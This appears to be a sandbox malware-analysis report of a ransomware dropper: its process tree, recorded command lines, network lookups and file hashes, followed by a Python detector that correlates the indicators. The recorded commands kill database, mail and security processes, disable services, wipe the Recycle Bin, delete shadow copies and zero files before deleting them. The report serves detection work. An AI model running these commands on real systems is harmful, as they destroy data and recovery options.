PID 5868 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 5868 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5724 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5724 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5972 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5972 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5196 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5656 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\cmd.exe
PID 5868 wrote to memory of 5656 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\cmd.exe
PID 5868 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 3264 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5384 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 5384 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 5868 wrote to memory of 4464 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqbcoreservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM firefoxconfig.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM agntsvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM thebat.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM steam.exe /F

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM encsvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM excel.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM CNTAoSMgr.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlwriter.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM tbirdconfig.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM dbeng50.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM thebat64.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocomm.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM infopath.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mbamtray.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM zoolz.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" IM thunderbird.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM dbsnmp.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM xfssvccon.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM Ntrtscan.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM isqlplussvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM onenote.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM PccNTMon.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM msaccess.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM outlook.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM tmlisten.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM msftesql.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM powerpnt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM visio.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM winword.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld-nt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM wordpad.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld-opt.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocautoupds.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocssd.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM oracle.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlagent.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlbrowser.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlservr.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM synctime.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”
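The process list above is the whole pre-encryption routine in the order the sandbox recorded it: sc.exe disables SQL telemetry, the SQL VSS writer and SstpSvc, taskkill /IM ... /F is fired at database, mail, Office and endpoint-security processes so their open files can be overwritten, the Recycle Bin is removed, Win32_ShadowCopy instances are deleted through WMI, the ransom note is opened in notepad, and a cmd.exe one-liner zeroes the first 512 KiB of a file before deleting it. Two details worth noticing in the recorded lines: one taskkill is issued as "IM thunderbird.exe" without the slash, which taskkill rejects, so that process is never actually terminated; and the fsutil/Del self-delete template still carries the literal "%s" placeholder, so the dropper is instead removed by the separate "choice /C Y /N /D Y /T 3 & Del ..." command. The block below is an added example, not part of the sandbox report: it runs over constructed process-creation events modelled on these command lines (the event tuple format, the kill-list, the inspected images and the score weights are assumptions) and correlates them per parent PID so the sequence is judged as one incident rather than fifty isolated taskkill alerts.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed process-creation events (parent PID, image, command line) modelled on
# the behavioral12 process list above. Not sandbox output; PID 1234 is benign noise.
SAMPLE_EVENTS = [
    (5868, r"C:\Windows\SYSTEM32\sc.exe", '"sc.exe" config SQLWriter start= disabled'),
    (5868, r"C:\Windows\SYSTEM32\sc.exe", '"sc.exe" config SstpSvc start= disabled'),
    (5868, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM mysqld.exe /F'),
    (5868, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM sqlservr.exe /F'),
    (5868, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM outlook.exe /F'),
    (5868, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM mbamtray.exe /F'),
    (5868, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" IM thunderbird.exe /F'),  # slash missing, as recorded
    (5868, r"C:\Windows\SYSTEM32\cmd.exe", '"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin'),
    (5868, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     '"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }'),
    (5868, r"C:\Windows\SYSTEM32\cmd.exe",
     '"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "x.exe" & Del /f /q "x.exe"'),
    (1234, r"C:\Windows\SYSTEM32\sc.exe", '"sc.exe" config Spooler start= disabled'),
    (1234, r"C:\Windows\SYSTEM32\taskkill.exe", '"taskkill.exe" /IM notepad.exe /F'),
]

# Processes ransomware terminates before encryption so that open database, mail and
# Office files can be overwritten; taken from the taskkill list above.
KILL_TARGETS = {
    "sqlservr.exe", "sqlagent.exe", "sqlbrowser.exe", "sqlwriter.exe", "msftesql.exe",
    "mysqld.exe", "mysqld-nt.exe", "mysqld-opt.exe", "oracle.exe", "ocssd.exe", "dbsnmp.exe",
    "outlook.exe", "thunderbird.exe", "thebat.exe", "thebat64.exe", "winword.exe", "excel.exe",
    "powerpnt.exe", "onenote.exe", "msaccess.exe", "visio.exe", "wordpad.exe", "infopath.exe",
    "mbamtray.exe", "ntrtscan.exe", "pccntmon.exe", "tmlisten.exe", "cntaosmgr.exe",
}
# Only these child images are worth inspecting; everything else is skipped cheaply.
INSPECTED_IMAGES = {"sc.exe", "taskkill.exe", "cmd.exe", "powershell.exe", "wmic.exe", "vssadmin.exe"}

# The report shows one taskkill without the slash before IM, so the slash is optional here.
TASKKILL_RE = re.compile(r'taskkill(?:\.exe)?"?\s+/?IM\s+(\S+)\s+/F', re.IGNORECASE)
SC_DISABLE_RE = re.compile(r'sc(?:\.exe)?"?\s+config\s+(\S+)\s+start=\s*disabled', re.IGNORECASE)
SHADOW_RE = re.compile(r'win32_shadowcopy.*delete|vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete',
                       re.IGNORECASE)
RECYCLE_RE = re.compile(r'rd\s+/s\s+/q\s+\S*\$Recycle\.bin', re.IGNORECASE)
SELF_DELETE_RE = re.compile(r'fsutil\s+file\s+setZeroData.*&\s*del\s', re.IGNORECASE)


@dataclass
class ParentActivity:
    killed: set = field(default_factory=set)
    disabled_services: set = field(default_factory=set)
    shadow_copy_deletion: bool = False
    recycle_bin_wipe: bool = False
    self_delete: bool = False

    def score(self) -> int:
        """Weights are an assumption: shadow-copy deletion and a wide kill list dominate."""
        hits = len(self.killed & KILL_TARGETS)
        s = 3 if hits >= 3 else (1 if hits else 0)
        s += 1 if self.disabled_services else 0
        s += 3 if self.shadow_copy_deletion else 0
        s += 1 if self.recycle_bin_wipe else 0
        s += 2 if self.self_delete else 0
        return s


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Group indicators by parent PID so the sequence is judged as a whole."""
    by_parent = defaultdict(ParentActivity)
    for ppid, image, cmdline in events:
        if basename(image) not in INSPECTED_IMAGES:
            continue
        act = by_parent[ppid]
        if m := TASKKILL_RE.search(cmdline):
            act.killed.add(m.group(1).lower())
        elif m := SC_DISABLE_RE.search(cmdline):
            act.disabled_services.add(m.group(1))
        else:
            act.shadow_copy_deletion |= bool(SHADOW_RE.search(cmdline))
            act.recycle_bin_wipe |= bool(RECYCLE_RE.search(cmdline))
            act.self_delete |= bool(SELF_DELETE_RE.search(cmdline))
    return dict(by_parent)


def alerts(events, threshold: int = 6):
    """Return {parent_pid: score} for parents whose combined activity crosses the threshold."""
    return {ppid: act.score() for ppid, act in correlate(events).items() if act.score() >= threshold}


if __name__ == "__main__":
    for ppid, act in correlate(SAMPLE_EVENTS).items():
        print(ppid, act.score(), sorted(act.killed & KILL_TARGETS), sorted(act.disabled_services))
    print("alerts:", alerts(SAMPLE_EVENTS))
```

Per-parent correlation is the point: a single "sc config X start= disabled" from an administrator (PID 1234 above) scores 1 and stays below the threshold, while the dropper's combination of kill list, service disabling, shadow-copy deletion and self-delete scores 10 from the same parent. In a real pipeline the parent key would be the process GUID rather than the PID, since PIDs are reused.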

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/5868-0-0x00007FFCE4B23000-0x00007FFCE4B25000-memory.dmp

memory/5868-1-0x0000000000460000-0x000000000047A000-memory.dmp

memory/5868-2-0x00007FFCE4B20000-0x00007FFCE55E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x0v4sv2x.erg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/6024-26-0x000002EE72640000-0x000002EE72662000-memory.dmp

C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]

MD5 2655405a33e066dde607c60e36b4c8b9
SHA1 f7bc0862eaafdda06b33c45de8a543e26e22262b
SHA256 fbe5bae770bce80c9699b918a347b3a3683eeb7ca3fa38ec337f3fd08965aaea
SHA512 3a382c8d7b3f2aab1e7452137e32762040794e052460148d48415bef051873a74b011b3f8b02b629b6b6fa5b60a40d2234eb33beb5f7548eb37ca98981ee946e

C:\ProgramData\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\dotnet-runtime-6.0.27-win-x64.msi

MD5 e1e8698145f7c1ae7f1c5ebe079b13ef
SHA1 c8abbf16311bacda66b028a039eacbc2020a229e
SHA256 c87f671ee6180d683d1c87bfd33b013d959ce9313c03a75779b5ca20001c1387
SHA512 b058ce20de6bddd5a3544e2db5c27d623ebfec4750d1d10e892179ba32af52134b9bd2af5ce6ecffb3d463fe6acd27864c02837a3684ff2282fa099a487cf962

memory/5868-147-0x00007FFCE4B23000-0x00007FFCE4B25000-memory.dmp

memory/5868-165-0x00007FFCE4B20000-0x00007FFCE55E1000-memory.dmp

C:\ProgramData\Package Cache\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}v56.64.8781\dotnet-hostfxr-7.0.16-win-x64.msi.energy[[email protected]]

MD5 dbec20383217be97a135e6c2688638f0
SHA1 94b9d716dd1d1e3c71296c3aeae74fa349a5c661
SHA256 ee216245d85807a0bca25c65c8ebec3d755bec741c569d1522ceb30d26049dd7
SHA512 95a877c518c28e80a19841a4204b1d2390635a02ddff93ed010bb7b0eec46f5739041dddd776afadfcd54321b444ad90f24ac6a02c8be94a4bfe9e0e003ba557

C:\ProgramData\Package Cache\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}v56.64.8804\windowsdesktop-runtime-7.0.16-win-x64.msi

MD5 3080ea35e852d4931c5bd623c36c1579
SHA1 f427f25a79303745826418d9f286f8651101c244
SHA256 4f8fcfc89a2eacdbc42ba3f6e0661f81ebcf285145f02336c63423ebed490cc1
SHA512 a2b73cfbab67ca5e6f5633306a1cbc4808552e2a83adc81fa474b61f961b0feeb11d2cca79e46961b11ccbc241352b4e6a03863f0f599b1d5fd873910637a11a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 47d9df7fab0d0c96afdd2ca49f2b5030
SHA1 92583883bcf376062ddef5db2333f066d8d36612
SHA256 0f244dd39698dace2c650435886b1175ea01131e581d6c13888576c07fa40b02
SHA512 1844ce4f35849b70c246127482040986caa1bbae2d81119c77e9841f2a3280aabae0ad0db52fc29fe48023b4f4c073fe759b1f54e70e1562289d5e349c015200

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

MD5 8b0e6b329e10690fdd2a8fa8c00c1c19
SHA1 a4b8358d0fe39f9116cf7866c884270b9fa67b4d
SHA256 6e6e9634339fa105a427ef5a4754e019484213fcab61e748fac228b1cad1675a
SHA512 63c5fa09cfc3897061257e8adc76f7fe1116bfc769c52c788fa72456c910f327cf94c3b3f4feb35bbaeb988ca463ab8888976678c8a19b8de213cbc30db3916d

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

MD5 9b7f72f2f2a46d5b39f97ce8b62a53e1
SHA1 1526bebef5ee0ec24493f2c2d640f766d4c2ce08
SHA256 5a615c1135edcdaa50b5ffe954c41aa97536ff3c12768d556a19b9fe2f981843
SHA512 88e697c1f90ab057d42dd9d27db33927e3fe1bbd8ee250917b755f88e0a32ed1b0cb573af089488fda3c791cae9eef5e6cd01372e309f61509b48b53abe164e5

